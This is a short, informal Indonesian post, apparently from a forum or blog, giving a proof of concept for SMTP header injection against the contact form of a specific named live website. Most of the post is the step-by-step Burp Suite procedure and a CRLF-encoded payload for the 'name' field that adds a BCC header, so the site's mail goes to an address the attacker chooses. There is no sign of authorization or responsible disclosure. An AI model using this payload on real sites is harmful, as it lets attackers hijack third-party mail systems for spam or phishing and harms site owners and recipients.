iseng2 riset SMTP header injection jadi yah kira2 seperti ini la proof of concept nya
- jalanin burp suite
- buka web ini
http://sbp.net.id/contact-us.php
- isi sembarang trus klik Send Message
- liat POST requestnya di burp trus send ke Repeater
- masukin payload berikut ke parameter name
SAYA%20GANTENG%3e%0d%0aBCC%
3aEMAIL_GANTENG@gmail.com%0d%0aecc%3a%20g
- Klik Go trus cek email yang tadi dimasukin (
EMAIL_GANTENG@gmail.com) biasanya masuk ke spam
![di burp repeater][1]
[1]:
http://ibb.co/jCFMZG
![masuk ke spam email][2]
[2]:
http://ibb.co/fGcDgw
kalo udah ga bisa kemungkinan besar sudah diperbaiki bugnya.
demikian sekilas info
